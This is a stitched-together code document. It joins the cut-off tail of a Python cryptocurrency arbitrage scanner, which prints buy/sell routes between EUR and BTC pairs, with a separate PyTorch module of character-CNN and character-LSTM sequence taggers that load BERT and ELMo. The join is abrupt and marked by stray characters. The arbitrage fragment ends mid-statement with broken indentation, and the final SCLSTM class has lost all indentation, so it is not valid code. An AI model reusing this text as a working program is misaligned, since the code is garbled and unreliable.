    print(strftime("[%H:%M] ") +"Buy DGB " +str(currDGBEURAsk) +"€ -> Sell DGB " +str(currDGBBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb13_profitB))
#ELF
arb14_profitA = safe_division((currELFEURBid - (currELFBTCAsk*currBTCEURAsk))*100.0,currELFBTCAsk*currBTCEURAsk)
if arb14_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ELF " +str(currELFBTCAsk) +" -> Sell ELF for " +str(currELFEURBid) +"€ = " +str("%.3f" % arb14_profitA))
arb14_profitB = safe_division((currELFBTCBid*currBTCEURBid - currELFEURAsk)*100.0,currELFEURAsk)
if arb14_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy ELF " +str(currELFEURAsk) +"€ -> Sell ELF " +str(currELFBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb14_profitB))
#ENJ
arb15_profitA = safe_division((currENJEURBid - (currENJBTCAsk*currBTCEURAsk))*100.0,currENJBTCAsk*currBTCEURAsk)
if arb15_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ENJ " +str(currENJBTCAsk) +" -> Sell ENJ for " +str(currENJEURBid) +"€ = " +str("%.3f" % arb15_profitA))
arb15_profitB = safe_division((currENJBTCBid*currBTCEURBid - currENJEURAsk)*100.0,currENJEURAsk)
if arb15_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy ENJ " +str(currENJEURAsk) +"€ -> Sell ENJ " +str(currENJBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb15_profitB))
#EOS
arb16_profitA = safe_division((currEOSEURBid - (currEOSBTCAsk*currBTCEURAsk))*100.0,currEOSBTCAsk*currBTCEURAsk)
if arb16_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy EOS " +str(currEOSBTCAsk) +" -> Sell EOS for " +str(currEOSEURBid) +"€ = " +str("%.3f" % arb16_profitA))
arb16_profitB = safe_division((currEOSBTCBid*currBTCEURBid - currEOSEURAsk)*100.0,currEOSEURAsk)
if arb16_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy EOS " +str(currEOSEURAsk) +"€ -> Sell EOS " +str(currEOSBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb16_profitB))
#ETC
arb17_profitA = safe_division((currETCEURBid - (currETCBTCAsk*currBTCEURAsk))*100.0,currETCBTCAsk*currBTCEURAsk)
if arb17_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ETC " +str(currETCBTCAsk) +" -> Sell ETC for " +str(currETCEURBid) +"€ = " +str("%.3f" % arb17_profitA))
arb17_profitB = safe_division((currETCBTCBid*currBTCEURBid - currETCEURAsk)*100.0,currETCEURAsk)
if arb17_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy ETC " +str(currETCEURAsk) +"€ -> Sell ETC " +str(currETCBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb17_profitB))
#GAS
arb18_profitA = safe_division((currGASEURBid - (currGASBTCAsk*currBTCEURAsk))*100.0,currGASBTCAsk*currBTCEURAsk)
if arb18_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy GAS " +str(currGASBTCAsk) +" -> Sell GAS for " +str(currGASEURBid) +"€ = " +str("%.3f" % arb18_profitA))
arb18_profitB = safe_division((currGASBTCBid*currBTCEURBid - currGASEURAsk)*100.0,currGASEURAsk)
if arb18_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy GAS " +str(currGASEURAsk) +"€ -> Sell GAS " +str(currGASBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb18_profitB))
#GNT
arb19_profitA = safe_division((currGNTEURBid - (currGNTBTCAsk*currBTCEURAsk))*100.0,currGNTBTCAsk*currBTCEURAsk)
if arb19_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy GNT " +str(currGNTBTCAsk) +" -> Sell GNT for " +str(currGNTEURBid) +"€ = " +str("%.3f" % arb19_profitA))
arb19_profitB = safe_division((currGNTBTCBid*currBTCEURBid - currGNTEURAsk)*100.0,currGNTEURAsk)
if arb19_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy GNT " +str(currGNTEURAsk) +"€ -> Sell GNT " +str(currGNTBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb19_profitB))
#HOT
arb20_profitA = safe_division((currHOTEURBid - (currHOTBTCAsk*currBTCEURAsk))*100.0,currHOTBTCAsk*currBTCEURAsk)
if arb20_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy HOT " +str(currHOTBTCAsk) +" -> Sell HOT for " +str(currHOTEURBid) +"€ = " +str("%.3f" % arb20_profitA))
arb20_profitB = safe_division((currHOTBTCBid*currBTCEURBid - currHOTEURAsk)*100.0,currHOTEURAsk)
if arb20_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy HOT " +str(currHOTEURAsk) +"€ -> Sell HOT " +str(currHOTBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb20_profitB))
#ICX
arb21_profitA = safe_division((currICXEURBid - (currICXBTCAsk*currBTCEURAsk))*100.0,currICXBTCAsk*currBTCEURAsk)
if arb21_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ICX " +str(currICXBTCAsk) +" -> Sell ICX for " +str(currICXEURBid) +"€ = " +str("%.3f" % arb21_profitA))
arb21_profitB = safe_division((currICXBTCBid*currBTCEURBid - currICXEURAsk)*100.0,currICXEURAsk)
if arb21_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy ICX " +str(currICXEURAsk) +"€ -> Sell ICX " +str(currICXBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb21_profitB))
#IOST
arb22_profitA = safe_division((currIOSTEURBid - (currIOSTBTCAsk*currBTCEURAsk))*100.0,currIOSTBTCAsk*currBTCEURAsk)
if arb22_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy IOST " +str(currIOSTBTCAsk) +" -> Sell IOST for " +str(currIOSTEURBid) +"€ = " +str("%.3f" % arb22_profitA))
arb22_profitB = safe_division((currIOSTBTCBid*currBTCEURBid - currIOSTEURAsk)*100.0,currIOSTEURAsk)
if arb22_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy IOST " +str(currIOSTEURAsk) +"€ -> Sell IOST " +str(currIOSTBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb22_profitB))
#KMD
arb23_profitA = safe_division((currKMDEURBid - (currKMDBTCAsk*currBTCEURAsk))*100.0,currKMDBTCAsk*currBTCEURAsk)
if arb23_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy KMD " +str(currKMDBTCAsk) +" -> Sell KMD for " +str(currKMDEURBid) +"€ = " +str("%.3f" % arb23_profitA))
arb23_profitB = safe_division((currKMDBTCBid*currBTCEURBid - currKMDEURAsk)*100.0,currKMDEURAsk)
if arb23_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy KMD " +str(currKMDEURAsk) +"€ -> Sell KMD " +str(currKMDBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb23_profitB))
#LINK
arb24_profitA = safe_division((currLINKEURBid - (currLINKBTCAsk*currBTCEURAsk))*100.0,currLINKBTCAsk*currBTCEURAsk)
if arb24_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LINK " +str(currLINKBTCAsk) +" -> Sell LINK for " +str(currLINKEURBid) +"€ = " +str("%.3f" % arb24_profitA))
arb24_profitB = safe_division((currLINKBTCBid*currBTCEURBid - currLINKEURAsk)*100.0,currLINKEURAsk)
if arb24_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy LINK " +str(currLINKEURAsk) +"€ -> Sell LINK " +str(currLINKBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb24_profitB))
#LRC
arb25_profitA = safe_division((currLRCEURBid - (currLRCBTCAsk*currBTCEURAsk))*100.0,currLRCBTCAsk*currBTCEURAsk)
if arb25_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LRC " +str(currLRCBTCAsk) +" -> Sell LRC for " +str(currLRCEURBid) +"€ = " +str("%.3f" % arb25_profitA))
arb25_profitB = safe_division((currLRCBTCBid*currBTCEURBid - currLRCEURAsk)*100.0,currLRCEURAsk)
if arb25_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy LRC " +str(currLRCEURAsk) +"€ -> Sell LRC " +str(currLRCBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb25_profitB))
#LSK
arb26_profitA = safe_division((currLSKEURBid - (currLSKBTCAsk*currBTCEURAsk))*100.0,currLSKBTCAsk*currBTCEURAsk)
if arb26_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LSK " +str(currLSKBTCAsk) +" -> Sell LSK for " +str(currLSKEURBid) +"€ = " +str("%.3f" % arb26_profitA))
arb26_profitB = safe_division((currLSKBTCBid*currBTCEURBid - currLSKEURAsk)*100.0,currLSKEURAsk)
if arb26_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy LSK " +str(currLSKEURAsk) +"€ -> Sell LSK " +str(currLSKBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb26_profitB))
#LTC
arb27_profitA = safe_division((currLTCEURBid - (currLTCBTCAsk*currBTCEURAsk))*100.0,currLTCBTCAsk*currBTCEURAsk)
if arb27_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LTC " +str(currLTCBTCAsk) +" -> Sell LTC for " +str(currLTCEURBid) +"€ = " +str("%.3f" % arb27_profitA))
arb27_profitB = safe_division((currLTCBTCBid*currBTCEURBid - currLTCEURAsk)*100.0,currLTCEURAsk)
if arb27_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy LTC " +str(currLTCEURAsk) +"€ -> Sell LTC " +str(currLTCBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb27_profitB))
#MIOTA
arb28_profitA = safe_division((currMIOTAEURBid - (currMIOTABTCAsk*currBTCEURAsk))*100.0,currMIOTABTCAsk*currBTCEURAsk)
if arb28_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy MIOTA " +str(currMIOTABTCAsk) +" -> Sell MIOTA for " +str(currMIOTAEURBid) +"€ = " +str("%.3f" % arb28_profitA))
arb28_profitB = safe_division((currMIOTABTCBid*currBTCEURBid - currMIOTAEURAsk)*100.0,currMIOTAEURAsk)
if arb28_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy MIOTA " +str(currMIOTAEURAsk) +"€ -> Sell MIOTA " +str(currMIOTABTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb28_profitB))
#NANO
arb29_profitA = safe_division((currNANOEURBid - (currNANOBTCAsk*currBTCEURAsk))*100.0,currNANOBTCAsk*currBTCEURAsk)
if arb29_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy NANO " +str(currNANOBTCAsk) +" -> Sell NANO for " +str(currNANOEURBid) +"€ = " +str("%.3f" % arb29_profitA))
arb29_profitB = safe_division((currNANOBTCBid*currBTCEURBid - currNANOEURAsk)*100.0,currNANOEURAsk)
if arb29_profitB >= min_profit:
    print(strftime("[%H:%M] ") +"Buy NANO " +str(currNANOEURAsk) +"€ -> Sell NANO " +str(currNANOBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb29_profitB))
#NAS
arb30_profitA = safe_division((currNASEURBid - (currNASBTCAsk*currBTCEURAsk))*100.0,currNASBTCAsk*currBTCEURAsk)
if arb30_profitA >= min_profit:
    print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy NAS " +str(currNASBTCAsk) +" -> Sell NAS for " +str(currNASEURBid) +"€ = " +str("%.3f" % arb30_profitA))
arb30_profitB = safe_division((currNASBTCBid*currBTCEURBid - currNASEURAsk)*100.0,currNASEURAsk)
if arb30_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy NAS " +str(currNASEURAsk) +"€ -> Sell NAS " +str(currNASBTCBid) +" -> Sell | |
import os
import torch
import torch.nn.functional as F
import transformers
from torch import nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch.nn.utils.rnn import pad_sequence
from .util import is_module_available, get_module_or_attr
from ..commons import ALLENNLP_ELMO_PRETRAINED_FOLDER
DEFAULT_BERT_PRETRAINED_NAME_OR_PATH = "bert-base-cased"
def get_pretrained_bert(pretrained_name_or_path=None):
    """Load a pretrained huggingface transformers model.

    Falls back to ``DEFAULT_BERT_PRETRAINED_NAME_OR_PATH`` when no
    name/path is given.
    """
    if not pretrained_name_or_path:
        pretrained_name_or_path = DEFAULT_BERT_PRETRAINED_NAME_OR_PATH
    return transformers.AutoModel.from_pretrained(pretrained_name_or_path)
def get_pretrained_elmo(elmo_options_file=None, elmo_weights_file=None):
    """Build an AllenNLP ``Elmo`` module from pretrained options/weights.

    Each of the two files is resolved in this order:
      1. the explicit argument, if given;
      2. a local copy under ``ALLENNLP_ELMO_PRETRAINED_FOLDER`` — only if that
         specific file actually exists;
      3. the public AllenNLP S3 URL.

    Fix: previously the local path was used whenever the folder existed, even
    when the individual file inside it was missing, which made Elmo fail to
    load instead of falling back to the download URL.

    Raises:
        ImportError: if the optional `allennlp` dependency is not installed.
    """
    if not is_module_available("allennlp"):
        raise ImportError(
            "install `allennlp` by running `pip install -r extras-requirements.txt`. See `README.md` for more info.")
    Elmo = get_module_or_attr("allennlp.modules.elmo", "Elmo")
    # Prefer local copies, but only when the files are really present.
    local_options_file = os.path.join(ALLENNLP_ELMO_PRETRAINED_FOLDER,
                                      "elmo_2x4096_512_2048cnn_2xhighway_options.json")
    local_weights_file = os.path.join(ALLENNLP_ELMO_PRETRAINED_FOLDER,
                                      "elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5")
    if not os.path.isfile(local_options_file):
        local_options_file = None
    if not os.path.isfile(local_weights_file):
        local_weights_file = None
    options_file = "https://allennlp.s3.amazonaws.com/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json"
    weights_file = "https://allennlp.s3.amazonaws.com/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
    elmo_options_file = elmo_options_file or local_options_file or options_file
    elmo_weights_file = elmo_weights_file or local_weights_file or weights_file
    # Third positional argument is num_output_representations=1. NOTE(review):
    # the original comment claimed it selects the CUDA device — that is not
    # what this Elmo parameter does.
    return Elmo(elmo_options_file, elmo_weights_file, 1)
#################################################
# CharCNNWordLSTMModel(CharCNNModel)
#################################################
class CharCNNModel(nn.Module):
    """Character-level CNN encoder.

    Maps a padded character-id matrix [BS, max_seq_len] to a fixed-size
    vector per row [BS, sum(nfilters)] by running parallel Conv2d+ReLU
    branches over the embedded characters and max-pooling each branch
    over the sequence dimension.
    """

    def __init__(self, nembs, embdim, padding_idx, filterlens, nfilters):
        super(CharCNNModel, self).__init__()
        # Trainable character embeddings.
        self.embeddings = nn.Embedding(nembs, embdim, padding_idx=padding_idx)
        self.embeddings.weight.requires_grad = True
        # One Conv2d+ReLU branch per (filter width, filter count) pair. The
        # input is unsqueezed to [BS, 1, MAXSEQ, EMBDIM]; each branch emits
        # [BS, count, MAXSEQ', 1].
        branches = [
            nn.Sequential(
                nn.Conv2d(1, count, (width, embdim), padding=(width - 1, 0),
                          dilation=1, bias=True, padding_mode='zeros'),
                nn.ReLU(),
            )
            for width, count in zip(filterlens, nfilters)
        ]
        self.convmodule = nn.ModuleList(branches)

    def forward(self, batch_tensor):
        """Encode [BS, max_seq_len] char ids into [BS, sum(nfilters)]."""
        embedded = self.embeddings(batch_tensor)   # [BS, L, E]
        stacked = torch.unsqueeze(embedded, dim=1)  # [BS, 1, L, E]
        pooled = []
        for branch in self.convmodule:
            # [BS, 1, L, E] -> [BS, count, L'] after dropping the width-1 dim.
            features = branch(stacked).squeeze(3)
            # Max-pool over the whole sequence -> [BS, count].
            pooled.append(F.max_pool1d(features, features.size(2)).squeeze(2))
        # Concatenate all branches -> [BS, sum(nfilters)].
        return torch.cat(pooled, dim=1)
class CharCNNWordLSTMModel(nn.Module):
    """Sequence tagger: per-word char-CNN encodings -> 2-layer BiLSTM -> linear logits.

    Each sentence arrives as a padded matrix of character ids per word; a
    CharCNNModel turns every word into a sum(nfilters)-dim vector, the word
    vectors are run through a bidirectional LSTM, and a dropout+linear head
    produces per-word logits over `output_dim` classes.
    """

    def __init__(self, nchars, char_emb_dim, char_padding_idx, padding_idx, output_dim):
        """
        Args:
            nchars: size of the character vocabulary.
            char_emb_dim: character embedding dimension.
            char_padding_idx: padding index for character embeddings.
            padding_idx: target label index ignored by the loss.
            output_dim: number of output classes per word.
        """
        super(CharCNNWordLSTMModel, self).__init__()
        # cnn module
        # takes in a list[pad_sequence] with each pad_sequence of dim: [BS][nwords,max_nchars]
        # runs a for loop to obtain list[tensor] with each tensor of dim: [BS][nwords,sum(nfilters)]
        # then use rnn.pad_sequence(.) to obtain the dim: [BS, max_nwords, sum(nfilters)]
        nfilters, filtersizes = [50, 100, 100, 100], [2, 3, 4, 5]
        self.cnnmodule = CharCNNModel(nchars, char_emb_dim, char_padding_idx, filtersizes, nfilters)
        self.cnnmodule_outdim = sum(nfilters)
        # lstm module
        # expected input dim: [BS,max_nwords,*] and batch_lengths as [BS] for pack_padded_sequence
        bidirectional, hidden_size, nlayers = True, 512, 2
        self.lstmmodule = nn.LSTM(self.cnnmodule_outdim, hidden_size, nlayers,
                                  batch_first=True, dropout=0.3, bidirectional=bidirectional)
        self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
        # output module
        assert output_dim > 0
        self.dropout = nn.Dropout(p=0.4)
        self.dense = nn.Linear(self.lstmmodule_outdim, output_dim)
        # loss
        # See https://pytorch.org/docs/stable/nn.html#crossentropyloss
        self.criterion = nn.CrossEntropyLoss(reduction='mean', ignore_index=padding_idx)

    def forward(self,
                batch_idxs: "list[pad_sequence]",
                batch_lengths: "tensor",
                aux_word_embs: "tensor" = None,
                targets: "tensor" = None,
                topk=1):
        """Run the tagger.

        Returns the scalar loss tensor in training mode; in eval mode returns
        a (loss ndarray, top-k indices ndarray) pair.

        NOTE(review): `loss` is only bound when `targets` is not None, so
        calling forward with targets=None raises NameError at the returns
        below — confirm all callers always pass targets.
        """
        batch_size = len(batch_idxs)
        # cnn: one [nwords, sum(nfilters)] encoding per sentence, then re-pad
        # to [BS, max_nwords, sum(nfilters)].
        cnn_encodings = [self.cnnmodule(pad_sequence_) for pad_sequence_ in batch_idxs]
        cnn_encodings = pad_sequence(cnn_encodings, batch_first=True, padding_value=0)
        # concat aux_embs
        # if not None, the expected dim for aux_word_embs: [BS,max_nwords,*]
        intermediate_encodings = cnn_encodings
        if aux_word_embs is not None:
            intermediate_encodings = torch.cat((intermediate_encodings, aux_word_embs), dim=2)
        # lstm
        # dim: [BS,max_nwords,*]->[BS,max_nwords,self.lstmmodule_outdim]
        intermediate_encodings = pack_padded_sequence(intermediate_encodings, batch_lengths,
                                                      batch_first=True, enforce_sorted=False)
        lstm_encodings, (last_hidden_states, last_cell_states) = self.lstmmodule(intermediate_encodings)
        lstm_encodings, _ = pad_packed_sequence(lstm_encodings, batch_first=True, padding_value=0)
        # dense
        # [BS,max_nwords,self.lstmmodule_outdim]->[BS,max_nwords,output_dim]
        logits = self.dense(self.dropout(lstm_encodings))
        # loss
        if targets is not None:
            assert len(targets) == batch_size  # targets:[[BS,max_nwords]
            # CrossEntropyLoss wants classes on dim 1.
            logits_permuted = logits.permute(0, 2, 1)  # logits: [BS,output_dim,max_nwords]
            loss = self.criterion(logits_permuted, targets)
        # eval preds
        if not self.training:
            probs = F.softmax(logits, dim=-1)  # [BS,max_nwords,output_dim]
            if topk > 1:
                topk_values, topk_inds = \
                    torch.topk(probs, topk, dim=-1, largest=True,
                               sorted=True)  # -> (Tensor, LongTensor) of [BS,max_nwords,topk]
            elif topk == 1:
                topk_inds = torch.argmax(probs, dim=-1)  # [BS,max_nwords]
            # Note that for those positions with padded_idx,
            # the arg_max_prob above computes a index because
            # the bias term leads to non-uniform values in those positions
            return loss.cpu().detach().numpy(), topk_inds.cpu().detach().numpy()
        return loss
#################################################
# CharLSTMWordLSTMModel(CharLSTMModel)
#################################################
class CharLSTMModel(nn.Module):
    """Character-level LSTM encoder.

    Maps a padded character-id matrix [BS, max_seq_len] (with per-row true
    lengths) to one fixed-size vector per row, combining the per-step LSTM
    outputs via "end" (last valid step), "max", or "mean".
    """

    def __init__(self, nembs, embdim, padding_idx, hidden_size, num_layers, bidirectional, output_combination):
        super(CharLSTMModel, self).__init__()
        # Trainable character embeddings.
        self.embeddings = nn.Embedding(nembs, embdim, padding_idx=padding_idx)
        self.embeddings.weight.requires_grad = True
        # Sequence encoder over the embedded characters; inputs are packed
        # with the true lengths before being fed in.
        self.lstmmodule = nn.LSTM(embdim, hidden_size, num_layers, batch_first=True, dropout=0.3,
                                  bidirectional=bidirectional)
        self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
        # How per-step outputs are reduced to a single vector.
        assert output_combination in ["end", "max", "mean"], print(
            'invalid output_combination; required one of {"end","max","mean"}')
        self.output_combination = output_combination

    def forward(self, batch_tensor, batch_lengths):
        """Encode [BS, max_seq_len] char ids into [BS, lstmmodule_outdim]."""
        n_rows = len(batch_tensor)
        embedded = self.embeddings(batch_tensor)  # [BS, L, E]
        # Pack -> LSTM -> unpack: [BS, L, lstmmodule_outdim].
        packed = pack_padded_sequence(embedded, batch_lengths, batch_first=True, enforce_sorted=False)
        step_outputs, (last_hidden_states, last_cell_states) = self.lstmmodule(packed)
        step_outputs, _ = pad_packed_sequence(step_outputs, batch_first=True, padding_value=0)
        # Reduce the step dimension according to the configured strategy.
        if self.output_combination == "end":
            # Pick each row's last valid timestep.
            final_idxs = torch.LongTensor([x - 1 for x in batch_lengths])
            return step_outputs[range(step_outputs.shape[0]), final_idxs, :]
        if self.output_combination == "max":
            pooled, _ = torch.max(step_outputs, dim=1)
            return pooled
        if self.output_combination == "mean":
            totals = torch.sum(step_outputs, dim=1)
            divisors = batch_lengths.unsqueeze(dim=1).expand(n_rows, self.lstmmodule_outdim)
            assert totals.size() == divisors.size()
            return torch.div(totals, divisors)
        raise NotImplementedError
class CharLSTMWordLSTMModel(nn.Module):
    """Sequence tagger: per-word char-LSTM encodings -> 2-layer BiLSTM -> linear logits.

    Like CharCNNWordLSTMModel, but each word is encoded by a character-level
    LSTM (CharLSTMModel, "end" combination) instead of a character CNN.
    """

    def __init__(self, nchars, char_emb_dim, char_padding_idx, padding_idx, output_dim):
        """
        Args:
            nchars: size of the character vocabulary.
            char_emb_dim: character embedding dimension.
            char_padding_idx: padding index for character embeddings.
            padding_idx: target label index ignored by the loss.
            output_dim: number of output classes per word.
        """
        super(CharLSTMWordLSTMModel, self).__init__()
        # charlstm module
        # takes in a list[pad_sequence] with each pad_sequence of dim: [BS][nwords,max_nchars]
        # runs a for loop to obtain list[tensor] with each tensor of dim: [BS][nwords,charlstm_outputdim]
        # then use rnn.pad_sequence(.) to obtain the dim: [BS, max_nwords, charlstm_outputdim]
        hidden_size, num_layers, bidirectional, output_combination = 256, 1, True, "end"
        self.charlstmmodule = CharLSTMModel(nchars, char_emb_dim, char_padding_idx, hidden_size, num_layers,
                                            bidirectional, output_combination)
        self.charlstmmodule_outdim = self.charlstmmodule.lstmmodule_outdim
        # lstm module
        # expected input dim: [BS,max_nwords,*] and batch_lengths as [BS] for pack_padded_sequence
        bidirectional, hidden_size, nlayers = True, 512, 2
        self.lstmmodule = nn.LSTM(self.charlstmmodule_outdim, hidden_size, nlayers,
                                  batch_first=True, dropout=0.3, bidirectional=bidirectional)
        self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
        # output module
        assert output_dim > 0
        self.dropout = nn.Dropout(p=0.4)
        self.dense = nn.Linear(self.lstmmodule_outdim, output_dim)
        # loss
        # See https://pytorch.org/docs/stable/nn.html#crossentropyloss
        self.criterion = nn.CrossEntropyLoss(reduction='mean', ignore_index=padding_idx)

    def forward(self,
                batch_idxs: "list[pad_sequence]",
                batch_char_lengths: "list[tensor]",
                batch_lengths: "tensor",
                aux_word_embs: "tensor" = None,
                targets: "tensor" = None,
                topk=1):
        """Run the tagger.

        Returns the scalar loss tensor in training mode; in eval mode returns
        a (loss ndarray, top-k indices ndarray) pair.

        NOTE(review): `loss` is only bound when `targets` is not None, so
        calling forward with targets=None raises NameError at the returns
        below — confirm all callers always pass targets.
        """
        batch_size = len(batch_idxs)
        # charlstm: one [nwords, charlstm_outdim] encoding per sentence, then
        # re-pad to [BS, max_nwords, charlstm_outdim].
        charlstm_encodings = [self.charlstmmodule(pad_sequence_, lens) for pad_sequence_, lens in
                              zip(batch_idxs, batch_char_lengths)]
        charlstm_encodings = pad_sequence(charlstm_encodings, batch_first=True, padding_value=0)
        # concat aux_embs
        # if not None, the expected dim for aux_word_embs: [BS,max_nwords,*]
        intermediate_encodings = charlstm_encodings
        if aux_word_embs is not None:
            intermediate_encodings = torch.cat((intermediate_encodings, aux_word_embs), dim=2)
        # lstm
        # dim: [BS,max_nwords,*]->[BS,max_nwords,self.lstmmodule_outdim]
        intermediate_encodings = pack_padded_sequence(intermediate_encodings, batch_lengths,
                                                      batch_first=True, enforce_sorted=False)
        lstm_encodings, (last_hidden_states, last_cell_states) = self.lstmmodule(intermediate_encodings)
        lstm_encodings, _ = pad_packed_sequence(lstm_encodings, batch_first=True, padding_value=0)
        # dense
        # [BS,max_nwords,self.lstmmodule_outdim]->[BS,max_nwords,output_dim]
        logits = self.dense(self.dropout(lstm_encodings))
        # loss
        if targets is not None:
            assert len(targets) == batch_size  # targets:[[BS,max_nwords]
            # CrossEntropyLoss wants classes on dim 1.
            logits_permuted = logits.permute(0, 2, 1)  # logits: [BS,output_dim,max_nwords]
            loss = self.criterion(logits_permuted, targets)
        # eval preds
        if not self.training:
            probs = F.softmax(logits, dim=-1)  # [BS,max_nwords,output_dim]
            if topk > 1:
                topk_values, topk_inds = \
                    torch.topk(probs, topk, dim=-1, largest=True,
                               sorted=True)  # -> (Tensor, LongTensor) of [BS,max_nwords,topk]
            elif topk == 1:
                topk_inds = torch.argmax(probs, dim=-1)  # [BS,max_nwords]
            # Note that for those positions with padded_idx,
            # the arg_max_prob above computes a index because
            # the bias term leads to non-uniform values in those positions
            return loss.cpu().detach().numpy(), topk_inds.cpu().detach().numpy()
        return loss
#################################################
# SCLSTM
#################################################
class SCLSTM(nn.Module):
def __init__(self, screp_dim, padding_idx, output_dim):
super(SCLSTM, self).__init__()
# lstm module
# expected input dim: [BS,max_nwords,*] and batch_lengths as [BS] for pack_padded_sequence
bidirectional, hidden_size, nlayers = True, 512, 2
self.lstmmodule = nn.LSTM(screp_dim, hidden_size, nlayers,
batch_first=True, dropout=0.4, bidirectional=bidirectional) # 0.3 or 0.4
self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
# output module
assert output_dim > 0
self.dropout = nn.Dropout(p=0.5) # 0.4 or 0.5
self.dense = nn.Linear(self.lstmmodule_outdim, output_dim)
# loss
# See https://pytorch.org/docs/stable/nn.html#crossentropyloss
self.criterion = nn.CrossEntropyLoss(reduction='mean', ignore_index=padding_idx)
def forward(self,
batch_screps: "list[pad_sequence]",
batch_lengths: "tensor",
aux_word_embs: "tensor" = None,
targets: "tensor" = None,
topk=1):
# cnn
batch_size = len(batch_screps)
batch_screps = pad_sequence(batch_screps, batch_first=True, padding_value=0)
# concat aux_embs
# if not None, the expected dim for aux_word_embs: [BS,max_nwords,*]
intermediate_encodings = batch_screps
if aux_word_embs is not None:
intermediate_encodings = torch.cat((intermediate_encodings, aux_word_embs), dim=2)
# lstm
# dim: [BS,max_nwords,*]->[BS,max_nwords,self.lstmmodule_outdim]
intermediate_encodings = pack_padded_sequence(intermediate_encodings, batch_lengths,
batch_first=True, enforce_sorted=False)
lstm_encodings, (last_hidden_states, last_cell_states) = self.lstmmodule(intermediate_encodings)
lstm_encodings, _ = pad_packed_sequence(lstm_encodings, batch_first=True, padding_value=0)
# dense
# [BS,max_nwords,self.lstmmodule_outdim]->[BS,max_nwords,output_dim]
logits = self.dense(self.dropout(lstm_encodings))
# loss
if targets is not None:
assert len(targets) == batch_size # targets:[[BS,max_nwords]
logits_permuted = logits.permute(0, 2, 1) # logits: [BS,output_dim,max_nwords]
loss = self.criterion(logits_permuted, targets)
# eval preds
